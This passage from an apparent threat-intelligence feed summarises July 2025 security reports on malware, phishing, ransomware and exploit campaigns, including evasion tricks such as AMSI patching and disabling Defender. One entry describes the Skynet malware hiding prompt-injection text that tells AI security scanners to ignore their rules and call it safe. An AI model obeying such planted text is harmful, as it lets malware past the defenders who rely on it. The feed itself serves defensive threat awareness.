Summary:: Researchers from Unit42 have discovered a cyber-espionage campaign, tracked as CL-STA-1020, targeting government organizations in Southeast Asia to collect sensitive information related to recent trade disputes. The attackers use a custom-made malware called HazyBeacon which is installed through DLL sideloading by disguising it as a legitimate Windows file and establishing persistence through a custom Windows service named msdnetsvc . The malware communicates with actor-controlled AWS Lambda URLs to make the network traffic appear normal by hiding it within standard HTTPS cloud operations to evade detection. Additionally, the threat actors download multiple payloads such as a file collector, 7-Zip archiver, and custom tools for uploading stolen files to Google Drive/Dropbox.

Source: https://unit42.paloaltonetworks.com/windows-backdoor-for-novel-c2-communication/

Intel Source:: Evalian

Intel Name:: Red_Bull_Recruitment_Phishing_Campaign

Date of Scan:: 2025-07-19

Impact:: LOW

Summary:: Evalian researchers have discovered a phishing campaign impersonating Red Bull recruitment team, targeting job seekers through spear phishing emails. These emails contain embedded links that redirect recipients to a fraudulent but legitimate looking job application site protected by a reCAPTCHA challenge to enhance legitimacy. Victims are then taken to a spoofed Facebook login page designed to harvest credentials which are subsequently transmitted to attacker-controlled server. This malicious infrastructure is hosted on low-trust VPS services under ASN 63023 and hidden behind newly registered domains. If victims reuse their Facebook credentials across other platforms, the stolen information could facilitate to account takeovers, unauthorized system access, and data exfiltration.

Source: https://evalian.co.uk/inside-a-red-bull-themed-recruitment-phishing-campaign/

Intel Source:: Google Threat Intelligence

Intel Name:: SonicWall_SMA_Exploitation_via_OVERSTEP

Date of Scan:: 2025-07-18

Impact:: HIGH

Summary:: Google Threat Intelligence Group have observed financially motivated activity by the threat actor UNC6148 targeting end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. These campaigns exploit known vulnerabilities in unpatched or outdated devices to gain initial access. UNC6148 leveraged these vulnerabilities to obtain administrator credentials and one-time password (OTP) seed values—effectively bypassing multi-factor authentication (MFA). Once inside, they deployed OVERSTEP, a previously undocumented user-mode rootkit and backdoor. OVERSTEP achieves persistence through multiple techniques: injecting a malicious shared object via /etc/ld.so.preload and modifying the system’s INITRD image, allowing the malware to survive reboots. The rootkit covertly hijacks file API functions to hide its presence, establishes reverse shells using bash, and exfiltrates sensitive data—including SQLite databases and certificate files—through web-accessible directories. The primary targets are organizations with externally exposed SMA appliances running outdated firmware. The compromise facilitates credential theft, undermines authentication mechanisms, enables extortion, and may lay the groundwork for future ransomware attacks.

Source: https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor

Intel Source:: Ontinue

Intel Name:: SVG_Smuggling_via_JavaScript_Redirects

Date of Scan:: 2025-07-18

Impact:: LOW

Summary:: Researchers at Ontinue have identified a threat campaign where attackers embed obfuscated JavaScript in SVG image files to perform browser-based redirects to attacker-controlled infrastructure for victim tracking and correlation. Delivered via spearphishing emails—either as attachments or hosted image links—the campaign exploits misconfigured SPF, DKIM, and DMARC settings to spoof trusted senders. The embedded JavaScript decrypts a secondary payload using a static XOR key, reconstructs a malicious URL with atob(), and redirects the victim using window.location.href. Later campaign stages add geofencing to selectively target users. By abusing the benign SVG format and requiring no downloads or macros, the method bypasses traditional defenses. Victims include B2B service providers in finance, utilities, HR, and SaaS sectors.

Source: https://www.ontinue.com/resource/blog-svg-smuggling/

Intel Source:: Trustwave

Intel Name:: KAWA4096_Ransomware_Surge

Date of Scan:: 2025-07-18

Impact:: MEDIUM

Summary:: According to Trustwave SpiderLabs’ analysis, KAWA4096 emerged in June 2025 as a new ransomware strain blending code elements from the Akira family with a bespoke leak-site design. The group has claimed at least 11 victims, primarily in the United States and Japan. This Windows-targeting malware loads its configuration via the LoadResource API, spawns multiple threads synchronized by semaphores to encrypt local and network drives, and terminates backup, database and SAP services via SCM and WMI commands to maximize disruption. It also deletes shadow copies and can self-delete post-encryption, reflecting advanced evasion techniques.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/kawa4096s-ransomware-tide-rising-threat-with-borrowed-styles/

Intel Source:: Seqrite

Intel Name:: UNG0002_South_Asian_Espionage_Campaign

Date of Scan:: 2025-07-18

Impact:: MEDIUM

Summary:: Seqrite Labs researchers have identified a sophisticated and persistent threat actor, UNG0002, has been conducting espionage-oriented operations targeting multiple Asian jurisdictions since at least May 2024. Believed to originate from South-East Asia, the group's campaigns, "Operation Cobalt Whisper" and "Operation AmberMist," leverage multi-stage attacks beginning with CV-themed phishing lures to gain initial access. The actor employs a versatile toolset including custom remote access trojans (RATs) like Shadow RAT and INET RAT, alongside techniques such as DLL sideloading and a social engineering method dubbed "ClickFix" that uses fake CAPTCHA pages to execute malicious scripts. UNG0002's primary motivation is intelligence gathering, with a strategic focus on the defense, technology, aviation, and academic sectors. The group demonstrates high adaptability by mimicking the TTPs of other threat actors to complicate attribution and is continuously evolving its malware, indicating that future campaigns will likely feature refined tools and expanded targeting.

Source: https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/

Intel Source:: Securelist

Intel Name:: GhostContainer_Targets_MS_Exchange_Servers_in_Asia

Date of Scan:: 2025-07-18

Impact:: MEDIUM

Summary:: Researchers at Securelist have uncovered a new backdoor, dubbed GhostContainer, targeting Microsoft Exchange servers belonging to high-value organizations in Asia, including a government agency and a high-tech enterprise. The threat actors likely exploited a known N-day vulnerability in Exchange—suspected to be CVE-2020-0688—to gain initial access. After exploitation, they deployed a malicious ASP.NET assembly named App_Web_Container_1.dll onto the compromised servers. GhostContainer employs several advanced evasion techniques. It disables Windows Event Logging and patches the Antimalware Scan Interface (AMSI) to avoid detection. It also derives an AES encryption key from the Exchange server’s ASP.NET machine validation key, using it to decrypt commands embedded as Base64 strings in the x-owa-urlpostdata HTTP header. The malware’s Stub class is capable of executing shellcode, running system commands, performing file operations, and dynamically loading additional .NET modules. Additionally, GhostContainer includes a virtual page injector and web proxy module that support HTTP-based tunneling for command-and-control and data exfiltration.

Source: https://securelist.com/ghostcontainer/116953/

Intel Source:: Polyswarm

Intel Name:: NimDoor_macOS_Cryptocurrency_Stealer

Date of Scan:: 2025-07-17

Impact:: LOW

Summary:: Researchers from The Hivemind have observed a sophisticated macOS malware campaign deployed by the North Korea–linked threat actor group Stardust Chollima against Web3 and cryptocurrency organizations. First detected in April 2025, NimDoor leverages social engineering via Telegram to trick victims into installing a fake “Zoom SDK update” AppleScript, which then launches a multi-stage payload comprising Nim-compiled binaries, C++ Mach-O loaders and encrypted WebSocket C2 channels. A novel SIGTERM/SIGINT-based persistence mechanism, backed by a LaunchAgent fallback, ensures reinfection if the process is terminated or upon reboot.

Source: https://blog.polyswarm.io/nimdoor-macos-malware

Intel Source:: BI.ZONE

Intel Name:: Rainbow_Hyena_Phishing_Alert

Date of Scan:: 2025-07-17

Impact:: HIGH

Summary:: Researchers at BI.ZONE have identified that Rainbow Hyena launched a late-June phishing campaign targeting Russian healthcare and IT organizations, delivering ZIP-based polyglot attachments that conceal a decoy document and an LNK dropper to deploy the custom PhantomRemote backdoor. The operation used compromised sender addresses and recognizable branding to evade email filters and trick recipients into executing the payload. PhantomRemote launches via rundll32.exe and cmd.exe, harvests system identifiers (GUID, computer name, domain), and establishes HTTP-based C2 channels to download additional executables and exfiltrate command results. It creates persistent directories under %PROGRAMDATA% (YandexCloud or MicrosoftAppStore) for payload staging. Hidden PowerShell execution, binary obfuscation through polyglot files, and direct IP-based C2 demonstrate advanced evasion and access capabilities.

Source: https://bi.zone/eng/expertise/blog/rainbow-hyena-snova-atakuet-novyy-bekdor-i-smena-taktik/

Intel Source:: Dmpdump

Intel Name:: Belarus_Linked_CHM_Downloader_Targeting_Poland

Date of Scan:: 2025-07-17

Impact:: MEDIUM

Summary:: Researchers from dmpdump have observed a malicious HTML Help file exploiting Windows HTML Help to deploy a multi-stage downloader. Delivered as a fake bank transfer notification on June 30, 2025, the CHM triggers obfuscated script that leverages an ActiveX control to extract a staged loader from a CAB container. That loader uses XOR-based decryption and native HTTP APIs to fetch a concealed payload embedded in an image hosted on a remote server, then decrypts and executes it. The final payload establishes persistence by registering a scheduled task via COM. UNC1151 (FrostyNeighbor), a Belarus-linked actor, likely aims to maintain stealthy long-term access. The campaign’s living-off-the-land techniques and banking-themed lure illustrate advanced evasion.

Source: https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland/

Intel Source:: ASEC

Intel Name:: Indonesian_Data_Leak_and_Jordan_Bank_Ransomware

Date of Scan:: 2025-07-17

Impact:: LOW

Summary:: Researchers at ASEC have discovered two coordinated data compromise and ransomware incidents. In November 2022, actor wonder exploited misconfigured APIs on a major Indonesian fintech platform to harvest authentication tokens and personal details for 44 million customers, later offering the data on LeakBase and BreachForums. Shortly thereafter, the Everest group infiltrated Jordan Bank in Jordan, exfiltrating over 11 GB of internal records before deploying encryption malware and issuing double-extortion demands.

Source: https://asec.ahnlab.com/en/88936/

Intel Source:: Cyfirma

Intel Name:: Octalyn_Stealer

Date of Scan:: 2025-07-16

Impact:: LOW

Summary:: Cyfirma researchers have discovered a new malware called Octalyn Stealer, which is designed to steal sensitive data from Windows systems. It is built in C++ and comes with a Delphi-based builder tool, allowing low-skilled attackers to create custom malware using Telegram bot token and chat ID. Once executed, it silently steals browser passwords, cookies, Discord and Telegram tokens, VPN settings, gaming account info, and cryptocurrency wallet data. The malware achieves persistence by modifying the Startup folder and Windows registry key to run automatically at system startup.. It can also deliver additional malicious files using hidden PowerShell scripts. The stolen data is saved in a temporary folder named Octalyn, zipped into an archive, and then exfiltrated to the attacker via the Telegram API.

Source: https://www.cyfirma.com/research/octalyn-stealer-unmasked/

Intel Source:: EclecticIQ

Intel Name:: GLOBAL_GROUP_RaaS_Operator

Date of Scan:: 2025-07-16

Impact:: MEDIUM

Summary:: EclecticIQ researchers have uncovered a new ransomware -as-a-service (RaaS) group dubbed GLOBAL_GROUP, operated by the threat actor “$$$”. This group offers 85% share of ransom payments, along with user-friendly features like a mobile-accessible control panel and an AI-driven negotiation system. Their affiliates gain initial network access through brokers and brute-force tools to deploy customized ransomware capable of encrypting data across Windows, Linux, macOS, and VMware ESXi hosts. Once inside, affiliates communicate with victims through encrypted Tor-based sites to demand ransom and leverage AI-powered chatbots to engage victims during ransom negotiations, aiming to increase psychological pressure. So far, their attacks have impacted organizations in sectors like healthcare, oil-and-gas, industrial manufacturing, automotive services, and outsourcing, with victims located in countries including the U.S., U.K., Australia, and Brazil.

Source: https://blog.eclecticiq.com/global-group-emerging-ransomware-as-a-service

Intel Source:: Fortinet

Intel Name:: Dark_101_Ransomware

Date of Scan:: 2025-07-16

Impact:: MEDIUM

Summary:: FortiGuard researchers have discovered a new ransomware called Dark 101, leveraging .NET framework. It uses environmental checks and time-based delays to evade sandbox analysis. Once on a system, it hides by copying itself to the %AppData% folder under the name svchost.exe, mimicking a legitimate Windows system process. It then executes several commands such as vssadmin, wmic, and wbadmin to delete Volume Shadow Copies and the Windows Backup catalog. Additionally, it disables Task Manager by modifying system registry settings to prevent users from closing it manually. The malware scans for files with specific extensions, encrypts them, appends a random four-letter extension to the filenames and drops a read_it.txt ransom note demanding payment in Bitcoin. As a result, victims are left without easy recovery options and face significant operational disruption and potential financial loss.

Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-dark-101-ransomware-despite-evasion-techniques

Intel Source:: Google Threat Intelligence

Intel Name:: Multi_Stage_Phishing_via_Reservation_Portals

Date of Scan:: 2025-07-16

Impact:: MEDIUM

Summary:: Researchers at Google Threat Intelligence have uncovered a large-scale phishing operation exploiting legitimate reservation messaging channels to harvest payment credentials and personal data. The campaign employed a multi-stage infrastructure, with Tier 1 redirectors registered to domains mimicking genuine hotel confirmations and Tier 2 hosts serving fraudulent booking sites. Activity accelerated from January 2025, peaking in May and June, and was observed through both in-app chat threads and authentic-looking emails. Actors leveraged automated domain registration and meta-tag analysis to expand their infrastructure, then delivered victims a malicious archive containing logs of stolen guest booking details.

Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-GTI-II-Analyzing-a-massive/ba-p/923129?linkId=15662116

Intel Source:: Cybereason

Intel Name:: A_Hybrid_Approach_of_BlackSuit_Ransomware

Date of Scan:: 2025-07-15

Impact:: MEDIUM

Summary:: Researchers from Cybereason have uncovered a ransomware group known as BlackSuit that emerged in mid-2023 and is believed to be a successor to the Royal ransomware group. The group operates organized, multi-stage attacks involving both data exfiltration and file encryption. The attackers leverage Cobalt Strike Beacon for C2, deploy payload through PowerShell commands and disguising legitimate tools like rclone.exe to evade detection. They move laterally across the network using tools like PsExec, RPC, and RDP, even adding fake administrator accounts to gain wider access. The attackers also steal credentials from LSASS for privilege escalation and exfiltrates 6around 60 GB of sensitive data to cloud-based servers and demand ransom between $1 million and $10 million in Bitcoin.

Source: https://www.cybereason.com/blog/blacksuit-data-exfil

Intel Source:: Linkedin

Intel Name:: Fake_CAPTCHA_Social_Engineering

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Shaquib Izhar’s analysis on LinkedIn revealed an emerging social engineering campaign that ensnares victims with a counterfeit CAPTCHA page mimicking a common web security check. Upon clicking “Verify,” the page silently copies PowerShell code to the clipboard and prompts users to launch the Windows Run dialog, where it registers a webhook to monitor execution. The payload chain then delivers a secondary PowerShell loader and a batch script designed to detect and bypass virtualized environments before unleashing additional malware on standard Windows systems.

Source: https://www.linkedin.com/posts/shaquib-izhar_a-very-cool-fake-captcha-social-engineering-activity-7346678407419613184-B0-Y/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAABO-jCkB1he5ufTfbYYMNKmaojg8M31OVpM

Intel Source:: CERT-AGID

Intel Name:: Fake_SPID_Certificate_Renewal_Campaign

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: CERT-AGID researchers have observed a phishing campaign targeting SPID users. The campaign involves fraudulent emails with the subject “Your digital certificate has just been renewed”, prompting recipients to download a counterfeit digital certificate necessary for SPID access. Once clicked, recipients are redirected to a deceptive SPID login page to harvest credentials. Although the messages appear to come from noreply@spid.gov.it but actually sent from third-party servers lacking DKIM signatures and exploiting SPF misconfigurations to evade detection. If credentials are compromised, attackers could hijack SPID sessions, enabling unauthorized access to sensitive government and private-sector information.

Source: https://cert-agid.gov.it/news/il-tema-spid-ancora-sfruttato-per-una-nuova-campagna-di-phishing/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: The 360 Threat Intelligence Center have identified a recent espionage campaign attributed to the North Korean-based APT group Kimsuky (APT-C-55), targeting entities in South Korea. The threat actor uses a trojanized installer for the legitimate Bandizip software as an initial access vector. Upon execution, the installer deploys the HappyDoor backdoor, a known Kimsuky tool, which has been newly upgraded with a VMProtect shell to significantly hinder analysis and evade detection. The multi-stage infection process also involves using mshta.exe to fetch remote VBScript payloads for reconnaissance and data exfiltration. The backdoor establishes persistence via scheduled tasks and is capable of keylogging, screen capture, and stealing files with specific extensions such as .hwp and .pdf.

Source: https://mp.weixin.qq.com/s/fDan8ihUQEAF5Kf_6fXATQ?

Intel Source:: Cyberint

Intel Name:: An_Investigation_of_Qilin_Ransomware

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Researchers at Cyberint have observed that Qilin operates as an affiliate ransomware-as-a-service program deploying Rust-based binaries via spearphishing links to deliver customized double extortion campaigns. The campaign first exfiltrates sensitive data through malicious links embedded in phishing emails and then encrypts critical files using configurable modes—skip-step, percent, or fast—to maximize impact. Operators terminate specific processes, inhibit system recovery, and reboot hosts to hinder remediation. Victim data from multiple industries and geographies is posted on a proprietary dark-web leak site, pressuring organizations to comply. Samples exist for Windows and ESXi platforms, with the Rust variant offering enhanced evasion and resistance to analysis. Large-scale exfiltration campaigns have stolen hundreds of gigabytes of financial and proprietary data, including 340 GB from a U.S. financial advisory firm on July 1, 2025.

Source: https://cyberint.com/blog/research/qilin-ransomware/

Intel Source:: Checkpoint

Intel Name:: Prompt_Injection_Malware

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Researchers at Check Point have discovered a new malware called Skynet that was anonymously uploaded from the Netherlands. Although the malware is still in an early stage and not fully functional. The malware tries to trick AI-based security systems by including hidden prompt injection that instruct the AI to ignore its usual rules and incorrectly label the malware as safe. The malware also tries to evade detection using sandbox evasion, gathers basic system information and sets up a secure connection using the TOR network.

Source: https://research.checkpoint.com/2025/ai-evasion-prompt-injection/

Intel Source:: Medium (Koi Security)

Intel Name:: RedDirection_Malicious_Browser_Extensions

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: Researchers at Koi Security have observed eighteen malicious Chrome and Edge extensions that hijacked browser sessions and exfiltrated every visited URL from over 2.3 million users. Delivered via innocuous version updates through official auto-update pipelines, the extensions injected background scripts that captured tab URLs and unique identifiers, relaying them to a centralized command-and-control infrastructure. The attackers exploited trust signals verified publisher badges, featured placement and positive reviews—to evade marketplace vetting and persist undetected for years. Once activated, the malware periodically executed remote-instructed redirects to attacker-controlled sites, creating a persistent man-in-the-browser capability.

Source: https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5

Intel Source:: Varonis

Intel Name:: M365_Direct_Send_Phishing_Campaign

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: Researchers at Varonis have uncovered a phishing campaign exploiting Microsoft 365’s Direct Send feature to trick organizations. Normally, Direct Send is used by internal devices to send emails within an organisation without requiring authentication. The attackers send phishing emails disguised as voicemail notifications. These emails contain PDF attachments with QR codes. When scanned, the QR codes redirect victims to deceptive websites designed to steal their login credentials. The phishing email leverages IP located in Ukraine and bypasses basic email security checks like SPF, DKIM, or DMARC and delivered because the Direct Send feature treats them like internal messages. The campaign began in May 2025 and has already targeted over 70 organizations in the U.S., spanning different industries.

Source: https://www.varonis.com/blog/direct-send-exploit

Intel Source:: Reversinglabs

Intel Name:: Supply_Chain_Attack_Targets_Ethereum_Developers

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: ReversingLabs researchers uncovered a supply chain attack involving a GitHub user named Airez299, who compromised the ETHcode extension for Visual Studio Code. The attacker submitted a pull request that added a malicious dependency called keythereum-utils, which leverages Node.js’s require function to execute obfuscated JavaScript that silently launched a hidden PowerShell process. This process then downloaded and runs a secondary payload from a public file-hosting site. The campaign targets Ethereum smart contract developers through the extension’s automatic updates mechanism which had reached roughly 6,000 installs.

Source: https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension

Intel Source:: Splunk

Intel Name:: Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Splunk researchers uncovered a new malware campaign that uses a fake software installer created with Inno Setup. This installer includes a Pascal script designed to detect and evade debugger and sandbox environments before retrieving and decrypting a multi-stage payload . The installer connects to a TinyURL link that redirects to a file-hosting site (rentry.org), where it downloads a password-protected ZIP file. Once extracted, the malware runs a loader that decrypts and executes a malicious DLL file which then loads a secondary payload known as HijackLoader. It also creates a hidden scheduled task called lang that runs a disguised program every time the system restarts. In the final stage, the attack drops RedLine Stealer which collects saved passwords, cookies, form-fill data, and crypto wallet keys from various browsers and extensions.

Source: https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html

Intel Source:: Arcticwolf

Intel Name:: Oyster_Broomstick_Backdoor_via_SEO_Poisoning

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: Researchers from Arctic Wolf have observed a malvertising campaign leveraging search engine optimization poisoning to redirect IT professionals to trojanized installers of PuTTY and WinSCP. Embedded within legitimate packages, the Oyster and Broomstick backdoors grant stealthy remote-access footholds on on-premises administrative workstations. The campaign’s reliance on trusted binaries and absence of overt indicators complicates detection and response.

Source: https://arcticwolf.com/resources/blog/malvertising-campaign-delivers-oyster-broomstick-backdoor-via-seo-poisoning-trojanized-tools/

Intel Source:: Dark Atlas

Intel Name:: Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Researchers at Darkatlas have identified the Rhadamanthys infostealer campaign using a typosquatted ClickFix CAPTCHA domain to deliver a stealthy PowerShell launcher that executes in memory and retrieves a malicious MSI package, enabling a fileless dropper flow. That dropper fetches and executes PTRFHDGS.msi via msiexec.exe, masquerading as legitimate software and displaying a fake “Verification complete!” prompt to deceive users. The malware employs multiple anti-analysis checks—including virtualization and debugger detection, as well as time-based side-channel evasion—to hinder sandbox and manual analysis. Once active, Rhadamanthys’ modular architecture harvests a broad range of sensitive data—system identifiers, browser credentials, cryptocurrency wallets, screenshots, and application configurations—from Windows hosts.

Source: https://darkatlas.io/blog/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics

Intel Source:: Stairwell

Intel Name:: Defendnot_A_Silent_Windows_Defender_Disabler

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: Stairwell researchers have highlighted a new tool called defendnot, developed by user named es3n1n, which is designed to quietly disable Microsoft Defender. This tool leverages a sneaky technique by registering itself as another antivirus program through Windows Security Center (WSC) API, causing Defender to voluntarily disable itself. Although defendnot was initially released for red teaming, its design makes it useful for cybercriminals or nation-state actors. If attackers use this tool after compromising a system, they can run malware without being detected.

Source: https://stairwell.com/resources/detecting-defendnot-a-tool-for-silently-disabling-windows-defender/

Intel Source:: Huntress

Intel Name:: Exploitation_Wing_FTP_Serve_Vulnerability

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: Researchers from Huntress discovered that attackers were actively exploiting a vulnerability (CVE-2025-47812) in Wing FTP Server versions prior to 7.4.4. This flaw allows attackers to execute remote code on the system with full privileges. The attackers sent crafted requests to the server’s login page, injecting malicious Lua scripts that enabled them to run system commands like cmd.exe and certutil. Once inside, the attackers run basic reconnaissance commands such as ipconfig, whoami, created two backdoor user accounts named wingftp and wing and tried to install a remote access tool (ScreenConnect) along with a second-stage malware payload. However, this activity was flagged and blocked by Microsoft Defender as Trojan named Ceprol.

Source: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild

Intel Source:: Malware Traffic

Intel Name:: Lumma_Stealer_Deploys_Follow_up_Malware

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Researchers from Malware-Traffic have identified a malware campaign distributing Lumma Stealer, which subsequently deploys a persistent backdoor. The initial infection vector is social engineering, luring victims with cracked "Turnitin" software promoted on a Facebook page as of June 26, 2025. The user downloads a password-protected archive containing a Nullsoft installer. Upon execution, the installer uses an obfuscated batch script and a legitimate AutoIt interpreter to run the Lumma Stealer payload, which exfiltrates data from the compromised Windows system. The stealer then downloads a secondary loader, which retrieves a penetration testing tool from GitHub and establishes persistence via a shortcut in the Windows Startup folder.

Source: https://www.malware-traffic-analysis.net/2025/06/26/index.html

Intel Source:: unit42

Intel Name:: SLOW_TEMPEST_Malware_Obfuscation

Date of Scan:: 2025-07-12

Impact:: MEDIUM

Summary:: According to Unit 42’s analysis, SLOW#TEMPEST employs advanced control-flow obfuscation and dynamic jump dispatchers within a loader DLL to impede static reverse-engineering. The actor delivers an ISO-based dropper that uses the Windows API GlobalMemoryStatusEx to verify system memory exceeds six gigabytes before unpacking the payload, an anti-sandbox measure. First documented in July 2025, this campaign targets Windows environments where indirect function calls and obfuscated API invocations thwart signature and static analysis.

Source: https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/

Intel Source:: Cofense

Intel Name:: CapCut_Phishing_Campaign_Targets_Apple_Users

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Cofense researchers have uncovered a phishing campaign in which attackers create a fake CapCut invoices to trick users to steal their Apple credentials and payment information. The attackers send fake email claiming a $49.99 CapCut Pro charge via Apple, prompting users to cancel the subscription. When clicked, they’re taken to a deceptive Apple login page hosted on a non-Apple website, where their Apple ID credentials are stolen. The attack then escalates with a second phishing page requesting credit card details under the guise of processing a refund. The attackers even show a fake two-factor authentication screen designed to steal both login and payment details while keeping the victim engaged. If successful, it can lead to account takeovers, stolen money and identity theft.

Source: https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse

Intel Source:: ASEC

Intel Name:: Unauthorized_Proxy_Deployment_on_Linux_SSH

Date of Scan:: 2025-07-12

Impact:: LOW

Summary:: Researchers at ASEC have identified a campaign in which attackers target Linux systems with weak SSH passwords. The attackers gain initial access through brute-force or dictionary attacks and then execute Bash scripts to install proxy software such as TinyProxy or Sing-box. In the TinyProxy, they modify the configuration to allow unrestricted internet access and ensure the proxy starts automatically with the system. The Sing-box involves downloading and executing a one-click installation script from a public GitHub repository, enabling support for multiple proxy protocols including vmess-argo and TUICv5. These proxies can be leveraged to conceal further malicious activity or sold for illicit use.

Source: https://asec.ahnlab.com/ko/88669/

Intel Source:: Trellix

Intel Name:: DoNotAPT

Date of Scan:: 2025-07-11

Impact:: HIGH

Summary:: According to Trellix Advanced Research Center, the DoNot APT group conducted a multi-stage spear-phishing campaign against a Southern European foreign affairs ministry to facilitate long-term cyber espionage . The attackers impersonated defense officials in a crafted email with a Google Drive link, delivering a password-protected RAR archive that deployed a custom “LoptikMod” backdoor masquerading as a PDF. Once executed, the malware used binary-encoded obfuscation, dynamic API resolution, and scheduled tasks to achieve persistence. It gathered system details—including CPU model, OS build, username, hostname, and installed software—encrypted them with AES, and exfiltrated via HTTPS POST to a malicious domain. Follow-on downloads of a DLL module (“socker.dll”) and additional scheduled tasks (“MicorsoftVelocity”) enabled further command and control. Primary targets were government and diplomatic organizations running Windows. The operation’s impact includes unauthorized access to sensitive diplomatic communications, exposure of MFA credentials, and sustained network compromise.

Source: https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/

Intel Source:: ASEC

Intel Name:: GeoServer_CoinMiner_Exploit_Campaign

Date of Scan:: 2025-07-11

Impact:: LOW

Summary:: Researchers at AhnLab Security Emergency response Center have observed ongoing exploitation of unpatched GeoServer instances following the CVE-2024-36401 disclosure in 2024, allowing adversaries to execute remote code and deploy Monero mining payloads. These actors conduct automated scans for vulnerable GeoServer hosts, leverage the Java-based RCE to install NetCat for reverse-shell access and XMRig via platform-native scripts on both Windows and Linux systems.

Source: https://asec.ahnlab.com/en/88917/

Intel Source:: Cyble

Intel Name:: LogoKit_Phishing_Campaign

Date of Scan:: 2025-07-10

Impact:: LOW

Summary:: Researchers at Cyble have uncovered an ongoing phishing campaign that leverages LogoKit which is designed to steal login credentials by impersonating legitimate organizations. The threat actors are masquerading entities such as HunCERT, Kina Bank, the Catholic Church, and logistics companies to deceive users into entering their credentials. These fraudulent pages are hosted on Amazon S3 and Render and appear legitimate by incorporating Cloudflare Turnstile (a CAPTCHA service) and automatically retrieve real logos from Clearbit and Google Favicon. Once a victim enters their credentials, the data is exfiltrated to a C2 server through an HTTP POST request. The stolen credentials can enable attackers to gain unauthorized access, carry out business email compromise (BEC), move laterally within networks, and potentially cause major data breaches.

Source: https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/

Intel Source:: Splunk

Intel Name:: A_Deep_Dive_into_XWorm_Malware

Date of Scan:: 2025-07-10

Impact:: MEDIUM

Summary:: Researchers at Splunk have identified XWorm that employs a rotating arsenal of droppers, stagers, and payloads to evade detection and maintain persistent access on Windows endpoints . It leverages phishing lures impersonating invoices, shipping notices, or business requests to trick users into executing malicious attachments. XWorm is delivered in multiple formats such as .exe, .js, .vbs, .bat, .hta, .lnk and it uses advanced-evasion techniques such as AMSI bypass, ETW disablement, and registry-based Defender exclusions. It employs persistence by creating registry keys, scheduled tasks, startup folder, DLL side-loading, and USB or removable-media. Once active, it performs discovery of AV products, video-capture drivers, and graphics card information before establishing HTTP-based C2 communications. The mail objective of this malware is unauthorized data access, potential lateral movement, and long-term undetected system compromise.

Source: https://www.splunk.com/en_us/blog/security/xworm-shape-shifting-arsenal-detection-evasion.html

Intel Source:: Morphisec

Intel Name:: Pay2KeyI2P_Iranian_RaaS_Targets_the_West

Date of Scan:: 2025-07-10

Impact:: HIGH

Summary:: Morphisec's researchers have uncovered the resurgence of Pay2Key, an Iranian-backed ransomware-as-a-service (RaaS) operation now operating as Pay2Key.I2P and linked to the Fox Kitten APT group. Active since February 2025, this financially and ideologically motivated campaign targets Western organizations, particularly those perceived as enemies of Iran, and has already amassed over $4 million in ransoms. The attack begins with a sophisticated, multi-stage 7-Zip SFX payload that uses a polyglot CMD and PowerShell script to execute a series of anti-analysis checks and defense evasion techniques, including disabling Microsoft Defender. The final payload is the Themida-protected Mimic ransomware. With the recent addition of a Linux variant and a lucrative 80% profit share for affiliates attacking ideological targets, the threat surface is expanding.

Source: https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/

Intel Source:: ESentire

Intel Name:: SilentRoute_Backdoor_Exfiltrates_Credentials

Date of Scan:: 2025-07-10

Impact:: MEDIUM

Summary:: Researchers at eSentire uncovered a campaign in which threat actors created a fake version of SonicWall’s NetExtender VPN client by adding a hidden backdoor called SilentRoute. This campaign leverages an SEO poisoning tactic to lure remote-access users into downloading this malicious version from legitimate looking website that hosts a malicious installer named SonicWall-NetExtender.msi. Once installed, it captures login credentials—including domain, username, and password which then exfiltrated to attacker-controlled server. The main objective of this campaign is to target the corporate users of the SonicWall VPN client, allowing attackers to log in to organisation networks as legitimate users, move laterally and conduct additional malicious activities.

Source: https://www.esentire.com/blog/threat-actors-recompile-sonicwalls-netextender-to-include-silentroute-backdoor

Intel Source:: GData

Intel Name:: XMRig_Global_Cryptomining_Campaign

Date of Scan:: 2025-07-09

Impact:: LOW

